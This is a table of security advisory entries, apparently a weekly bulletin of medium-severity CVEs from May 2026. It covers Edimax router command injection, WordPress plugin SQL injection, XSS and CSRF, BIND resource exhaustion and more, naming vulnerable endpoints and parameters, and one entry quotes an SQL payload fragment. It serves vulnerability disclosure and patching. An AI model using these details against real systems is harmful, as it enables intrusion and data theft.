| Edimax--BR-6428NS | A command injection vulnerability was found in Edimax BR-6428NS 1.10 in the function formStaDrvSetup of the file /goform/formStaDrvSetup (POST Request Handler component). Manipulation of the stadrv_ssid argument results in command injection. The attack can be initiated remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-18 | 6.3 | CVE-2026-8777 | VDB-364402; Submit #811532 (EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formStaDrvSetup-34b53a41781f80ca940cc467cd15dfc2?source=copy_link |
| Edimax--BR-6428NS | A command injection vulnerability was identified in Edimax BR-6428NS 1.10 in the function system of the file /goform/formWlanM (POST Request Handler component). Manipulation of any of the arguments ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P can lead to command injection. The attack can be launched remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-23 | 6.3 | CVE-2026-9296 | VDB-365243; Submit #811535 (EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlanMP-34b53a41781f808fb207ce3f297db80b?source=copy_link |
| Edimax--BR-6428NS | A command injection vulnerability was detected in Edimax BR-6428NS 1.10 in the function formWlbasic of the file /goform/formWlbasic (POST Request Handler component). Manipulation of the repeaterSSID argument leads to command injection. The attack may be initiated remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-23 | 6.3 | CVE-2026-9297 | VDB-365244; Submit #811536 (EDIMAX BR-6428NS BR-6428NS_v4_1.10 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWlbasic-34b53a41781f807fb398dbab03bdbb38?source=copy_link |
| Edimax--BR-6675nD | A command injection vulnerability was discovered in Edimax BR-6675nD 1.12 in the function formHwSet of the file /goform/formHwSet (POST Request Handler component). Manipulation of any of the arguments regDomain/ABandregDomain/nic0Addr/nic1Addr/wlanAddr/inicAddr results in command injection. The attack can be launched remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 6.3 | CVE-2026-9378 | VDB-365341; Submit #811555 (EDIMAX BR-6675nD v1.12 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formHwSet-34b53a41781f8077b588f6e7cbbed36b?source=copy_link |
| Edimax--BR-6675nD | A command injection vulnerability was identified in Edimax BR-6675nD 1.12 in the function formWpsStart of the file /goform/formWpsStart (POST Request Handler component). Manipulation of the pinCode argument causes command injection. The attack can be initiated remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 6.3 | CVE-2026-9379 | VDB-365342; Submit #811556 and duplicate Submit #811567 (EDIMAX BR-6675nD v1.12 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWpsStart-34b53a41781f8011b77ac5ebb77dfddd?source=copy_link |
| Edimax--BR-6675nD | A command injection vulnerability was found in Edimax BR-6675nD 1.12 in the function formUSBStorage of the file /goform/formUSBStorage (POST Request Handler component). Manipulation of the sub_dir argument can lead to command injection. The attack can be launched remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 6.3 | CVE-2026-9400 | VDB-365381; Submit #811562 (EDIMAX BR-6675nD v1.12 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formUSBStorage-34b53a41781f80809fc9e6ab3c51328b?source=copy_link |
| Edimax--BR-6675nD | A command injection vulnerability was found in Edimax BR-6675nD 1.12 in the function formWlanMP of the file /goform/formWlanMP (POST Request Handler component). Manipulation of any of the arguments ateFunc/ateGain/ateRate/ateChan/ateTxCount/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/ateTxFreqOffset/ateMode/ateMacID/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/readE2P/e2pTxPwDeltaN results in command injection. The attack can be launched remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 6.3 | CVE-2026-9402 | VDB-365383; Submit #811565 (EDIMAX BR-6675nD v1.12 Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formWlanMP-34b53a41781f8041aa2ecb4fa1927f59?source=copy_link |
| Edimax--EW-7438RPn | An OS command injection vulnerability was identified in Edimax EW-7438RPn up to 1.31 in the function formWpsStart of the file /goform/formWpsStart (webs component). Manipulation of the pinCode argument causes OS command injection. The attack can be launched remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-23 | 6.3 | CVE-2026-9343 | VDB-365306; Submit #813884 (Edimax EW-7438RPn 1.31 Command Injection) and duplicate Submit #811551 (EDIMAX EW-7438RPn Mini Firmware 1.28a Command Injection); https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_1/1.md |
| Edimax--EW-7438RPn | An OS command injection vulnerability was found in Edimax EW-7438RPn up to 1.31 in the function formWizSurvey of the file /goform/formWizSurvey (webs component). Manipulation of any of the arguments ip/mask/gateway leads to OS command injection. The attack can be initiated remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 6.3 | CVE-2026-9347 | VDB-365310; Submit #813889 (Edimax EW-7438RPn 1.31 Command Injection) and duplicate Submit #811543 (EDIMAX EW-7438RPn Mini Firmware 1.28a Command Injection); https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_5/5.md |
| Edimax--EW-7438RPn | A command injection vulnerability was identified in Edimax EW-7438RPn 1.28a in the function formHwSet of the file /goform/formHwSet (POST Request Handler component). Manipulation of any of the arguments Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/comd/initgain/txcck/txofdm leads to command injection. The attack can be initiated remotely. An exploit is public and may be used. The vendor was contacted early about this disclosure but did not respond. | 2026-05-24 | 6.3 | CVE-2026-9359 | VDB-365322; Submit #811540 (EDIMAX EW-7438RPn Mini Firmware 1.28a Command Injection); https://lavender-bicycle-a5a.notion.site/EDIMAX-EW-7438RPn-Mini-formHwSet-34b53a41781f80b98d10f0da699f2236?source=copy_link |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.12. This affects the function formAccept of the file /goform/formAccep of the component POST Request Handler. This manipulation of the argument submit-url causes command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9361 | VDB-365324 | Edimax EW-7438RPn POST Request formAccep formAccept command injection VDB-365324 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811552 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formAccept-34b53a41781f807fb8f3d96c5e5ef215?source=copy_link |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.12. This vulnerability affects the function formConnectionSetting of the file /goform/formConnectionSetting of the component Setting Handler. Such manipulation of the argument max_Conn/timeOut leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9362 | VDB-365325 | Edimax EW-7438RPn Setting formConnectionSetting command injection VDB-365325 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811553 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formConnectionSetting-34b53a41781f807a9c88e746d24540cd?source=copy_link |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.12. This issue affects the function formEZCHNwlanSetup of the file /goform/formEZCHNwlanSetu of the component POST Request Handler. Performing a manipulation of the argument method results in command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9363 | VDB-365326 | Edimax EW-7438RPn POST Request formEZCHNwlanSetu formEZCHNwlanSetup command injection VDB-365326 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811554 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formEZCHNwlanSetup-34b53a41781f803a8c60ca409394df5b?source=copy_link |
| edmonparker--Read More & Accordion | The Read More & Accordion plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.5.7. This is due to the use of esc_sql() on a value that is then concatenated, unquoted, into an ORDER BY clause inside the getAllDataByLimit() and getAccordionAllDataByLimit() functions in ReadMoreData.php. The user-supplied $_GET['orderby'] value is only passed through esc_attr() (an HTML-escaping function) before reaching these database functions, where esc_sql() is applied and the result is concatenated directly into the ORDER BY fragment of the query before $wpdb->prepare() is called. Because esc_sql() only escapes quote characters and backslashes, which are irrelevant in an unquoted ORDER BY context, an attacker can inject arbitrary SQL expressions such as (SELECT SLEEP(5)) or conditional subqueries to perform time-based blind data extraction. This makes it possible for authenticated attackers with administrator-level access or above (or any role explicitly granted access to the plugin's admin pages via the yrm-user-roles setting) to extract sensitive data from the database, including administrator credential hashes. | 2026-05-20 | 4.9 | CVE-2026-7472 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc7c7e21-fbd7-4451-bc7d-3d11db01a443?source=cve https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1522 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1522 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/readMorePagesView.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/readMorePagesView.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1537 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1537 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/accordionBuilder/list.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/accordionBuilder/list.php#L29 |
| espocrm--espocrm | EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry points, resulting in stored cross-user XSS reachable through a normal attachment workflow. Although inline SVG script is blocked by the response CSP, the same CSP still allows same-origin external script. As a result, an attacker can upload a malicious SVG together with a second attacker-controlled JavaScript attachment, then trick another user into opening the SVG to execute JavaScript in the victim's EspoCRM origin. This issue has been fixed in version 9.3.4. | 2026-05-19 | 6.8 | CVE-2026-33741 | https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv |
| Esri--ArcGIS Server | ArcGIS Server contains an improper authentication vulnerability in an undocumented administrative endpoint. An unauthenticated attacker could exploit this issue by sending a crafted request to the endpoint. Successful exploitation may result in disruption of the web-based browsing interface. This issue affects ArcGIS Server 12.0 and earlier. | 2026-05-20 | 5.3 | CVE-2026-2812 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin |
| Esri--ArcGIS Server | ArcGIS Server contains an input validation weakness in the login redirection workflow. An authenticated attacker could exploit this issue by sending a specially crafted request; successful exploitation may result in the application redirecting the browser to an unintended, untrusted site, resulting in a limited confidentiality impact under specific user-interaction conditions. The vulnerability affects only the client-side navigation logic during authentication and remains confined to the same security boundary. No server-side compromise or cross-component impact is possible. This issue affects ArcGIS Server 11.5. | 2026-05-20 | 4.7 | CVE-2026-2813 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin |
| etspring--LJ comments import: reloaded | The LJ comments import: reloaded plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.97.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The vulnerability arises specifically because PHP_SELF includes attacker-controllable PATH_INFO appended to the script name, and there are two distinct unsanitized echo points for this value in the same function. | 2026-05-20 | 6.1 | CVE-2026-8624 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0f09cb59-dbbb-48a3-aeac-377f6ec87b88?source=cve https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L129 https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L161 |
| goback2--Logo Manager For Enamad | The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 6.4 | CVE-2026-6549 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6d1167-c89d-4c97-9446-b968df945e6c?source=cve https://wordpress.org/plugins/logo-manager-for-enamad https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/tags/0.7.4/widgets.php#L295 https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/trunk/widgets.php#L295 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is susceptible to a Configuration - 'Insecure Use of Base Image Version'. Using outdated or insecure base images may introduce known vulnerabilities, potentially increasing the risk of exploitation in the application environment. | 2026-05-20 | 4 | CVE-2025-31973 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCLSoftware--Connections | HCL Connections contains a broken access control vulnerability that may allow an unauthorized user to update data in certain scenarios. | 2026-05-18 | 4.6 | CVE-2026-21789 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129719 |
| HCLSoftware--DominoIQ | The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data. | 2026-05-20 | 6.5 | CVE-2026-21836 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932 |
| heartcombo--devise | Devise is an authentication solution for Rails based on Warden. In versions 5.0.3 and below, when the Timeoutable module is enabled in Devise, the FailureApp#redirect_url method returns request.referrer - the HTTP Referer header, which is attacker-controllable - without validation for any non-GET request that results in a session timeout. An attacker who hosts a page with an auto-submitting cross-origin form can cause a victim with an expired Devise session to be redirected to an arbitrary external URL. This contrasts with the GET timeout path (which uses server-side attempted_path) and Devise's own store_location_for mechanism (which strips external hosts via extract_path_from_location), both of which are protected; only the non-GET timeout redirect path is unprotected. Expired-session users can be silently redirected from the trusted app domain to attacker-controlled URLs, enabling phishing and malware delivery while bypassing browser warnings. Note: Rails' built-in open-redirect protection does not mitigate this issue. Devise::FailureApp is an ActionController::Metal app with its own isolated copy of the relevant redirect configuration, so config.action_controller.action_on_open_redirect = :raise (and the older raise_on_open_redirects setting) do not reach it. This issue has been fixed in version 5.0.4. | 2026-05-22 | 6.1 | CVE-2026-40295 | https://github.com/heartcombo/devise/security/advisories/GHSA-jp94-3292-c3xv https://github.com/heartcombo/devise/commit/025fe2124f9928766fc46520e999633b598d0360 |
| helgatheviking--KIA Subtitle | The KIA Subtitle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `the-subtitle` shortcode `before` and `after` attributes in all versions up to, and including, 4.0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-22 | 6.4 | CVE-2026-7509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a9a52097-0d85-4036-9b74-f35fea549607?source=cve https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L359 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L329 https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L359 https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L329 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L369 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L370 |
| helpstring--Child Height Predictor by Ostheimer | The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.3. This is due to missing nonce verification in the options() function, which handles plugin settings updates. The form template does not include a wp_nonce_field() call, and the handler never calls check_admin_referer() or wp_verify_nonce(). This makes it possible for unauthenticated attackers to trick a site administrator into clicking a link or visiting a malicious page that submits a forged POST request, causing unauthorized changes to the plugin settings such as unit preferences to be persisted to the database via update_option(). | 2026-05-20 | 4.3 | CVE-2026-6400 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1681a8-5f2e-45f1-96d9-797b13644607?source=cve https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L149 https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L149 https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L135 https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L135 |
| Honeywell International Inc.--Control Network Module (CNM) | Honeywell Control Network Module (CNM) contains insertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing system files, potentially resulting in unintended access to protected data. | 2026-05-21 | 5.9 | CVE-2026-5434 | https://process.honeywell.com/ |
| infility--Infility Global | The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 6.5 | CVE-2026-8685 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84 |
| Intelbras--VIP-1230-D-G4 | An issue in Intelbras VIP-1230-D-G4 version V2.800.00IB00C.0.T allows a remote attacker to obtain sensitive information via the password reset functionality under /OutsideCmd. | 2026-05-18 | 5.3 | CVE-2026-36438 | https://backend.intelbras.com/sites/default/files/2023-03/Datasheet%20UNIFICADO%20-%20VIP%201230%20B.D.G4-v2.pdf https://www.intelbras.com/pt-br/camera-dome-wi-fi-vip-1230-d-w-g4 https://github.com/kensh1k/CVE-2026-36438/tree/main |
| ISC--BIND 9 | BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 5.3 | CVE-2026-3592 | https://downloads.isc.org/isc/bind9/9.18.49 https://downloads.isc.org/isc/bind9/9.20.23 https://downloads.isc.org/isc/bind9/9.21.22 |
| ISC--BIND 9 | An unbounded resend loop vulnerability exists in the BIND 9 resolver state machine during bad-server handling, enabling a remote unauthenticated attacker to cause severe resource exhaustion by sending queries that trigger specific retry conditions. This issue affects BIND 9 versions 9.18.36 through 9.18.48, 9.20.8 through 9.20.22, 9.21.7 through 9.21.21, 9.18.36-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 5.3 | CVE-2026-5950 | https://downloads.isc.org/isc/bind9/9.18.49 https://downloads.isc.org/isc/bind9/9.20.23 https://downloads.isc.org/isc/bind9/9.21.22 |
| ItzCrazyKns--Vane | A security vulnerability has been detected in ItzCrazyKns Vane up to 1.12.1. Affected by this issue is some unknown functionality of the file route.ts of the component API. The manipulation leads to missing authentication. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been disclosed publicly and may be used. It appears that basic authentication is planned. | 2026-05-24 | 5.6 | CVE-2026-9371 | VDB-365334 (ItzCrazyKns Vane API route.ts missing authentication); Submit #813209 (ItzCrazyKns Vane 1.12.1 API Key Exposure); Submit #813210 (ItzCrazyKns Vane 1.12.1 Missing Authentication for Critical Function, duplicate); https://github.com/ItzCrazyKns/Vane/issues/1122 https://github.com/ItzCrazyKns/Vane/issues/1123 https://github.com/ItzCrazyKns/Vane/ |
| jarrodwatts--claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, constructs OSC 8 terminal hyperlink escape sequences from raw cwd and branchUrl values without stripping control characters or encoding the embedded values, allowing attackers to inject arbitrary ANSI codes into terminal sessions. An ESC+backslash (string terminator) sequence embedded in the current working directory or branch URL closes the hyperlink early, after which the attacker's own escape sequences are interpreted by the terminal: text colour changes, forged prompts, OSC 52 clipboard writes, or outbound HTTP requests to attacker-controlled remotes when the hyperlink is clicked. | 2026-05-18 | 4.6 | CVE-2026-47090 | https://github.com/jarrodwatts/claude-hud/issues/485 https://github.com/jarrodwatts/claude-hud/pull/487 https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30 https://www.vulncheck.com/advisories/claude-hud-terminal-injection-via-osc-8-hyperlinks |
| javibola--JaviBola Custom Theme Test | The JaviBola Custom Theme Test plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the options page. This makes it possible for unauthenticated attackers to change the site's active theme by modifying the jbct_theme option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8423 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68a8a277-2ea6-4d75-b8cd-4d20eb17b3aa?source=cve https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L41 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L41 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L40 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L40 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L54 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L54 |
| jay_patel--Remove Yellow BGBOX | The Remove Yellow BGBOX plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'rybb_api_settings' page. This makes it possible for unauthenticated attackers to reset the plugin's stored settings by overwriting its configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8424 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b30d27-a3f8-4535-a47f-675c939ec648?source=cve https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/admin/rybb_api_settings.php#L5 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/admin/rybb_api_settings.php#L5 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/includes/functions.php#L16 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/includes/functions.php#L16 |
| jetmonsters--MotoPress Hotel Booking | The MotoPress Hotel Booking plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite or delete the internal notes (_mphb_booking_internal_notes) of any booking by supplying an arbitrary booking ID. The nonce for this action is output in the HTML source of every public page through wp_localize_script (MPHB._data.nonces), so any unauthenticated visitor can obtain a valid nonce and perform the action without any account or prior interaction. | 2026-05-22 | 5.3 | CVE-2026-8684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6567e63c-3129-47b2-a734-733eb599821a?source=cve https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-api-handler.php#L43 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-api-handler.php#L43 https://plugins.trac.wordpress.org/changeset/3537354/motopress-hotel-booking-lite/trunk/includes/ajax-api/ajax-actions/update-booking-notes.php |
| Jomres--Jomres | Joomla Component jomres 9.11.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information by tricking authenticated users into visiting malicious pages. Attackers can craft HTML forms targeting the account/index endpoint with hidden fields to change passwords, email addresses, and profile details without user consent. | 2026-05-23 | 4.3 | CVE-2018-25354 | ExploitDB-44901; VulnCheck Advisory: Joomla Component jomres 9.11.2 Cross-Site Request Forgery |
| jupyterhub--jupyterhub | JupyterHub is software that allows users to create a multi-user server for Jupyter notebooks. In versions 4.1.0 through 5.4.4, XSRF protection (updated in 4.1.0) inappropriately treated requests with Sec-Fetch-Mode: no-cors as same-origin requests, bypassing XSRF checks. The JSON API is not affected, only HTTP form endpoints, such as /hub/spawn and /hub/accept-share, meaning attackers could trigger server spawn (but not access the server) and if the attacker is a JupyterHub user permitted to share access to their server, cause a user to accept a share and have access to the attacker's server. This issue has been fixed in version 5.4.5. If developers are unable to immediately upgrade, they can temporarily mitigate this issue by dropping requests to JupyterHub with Sec-Fetch-Mode: no-cors if they are using a reverse proxy. | 2026-05-22 | 5.4 | CVE-2026-40864 | https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-m68r-v472-jgq9 https://github.com/jupyterhub/jupyterhub/commit/9c5ec277d3cda5a59de2d8c8117efa77bd941127 |
| kasparsd--Widget Context | The Widget Context plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.3. This is due to missing or incorrect nonce validation on the save_widget_context_settings function. This makes it possible for unauthenticated attackers to modify widget visibility context settings stored in the WordPress options table via a forged POST request to /wp-admin/widgets.php, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-22 | 4.3 | CVE-2026-7615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c434637-4bf9-46ee-9a6d-35eab7ef11a1?source=cve https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L311 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L311 https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L282 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L282 https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L91 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L91 https://github.com/kasparsd/widget-context-wporg/pull/73 |
| Kieback & Peter--DDC4002 | The affected Kieback & Peter DDC building controllers are vulnerable to cross-site scripting, enabling JavaScript to be executed by the victim's browser, which allows the attacker to control the browser. | 2026-05-20 | 5.3 | CVE-2026-4293 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-139-05.json |
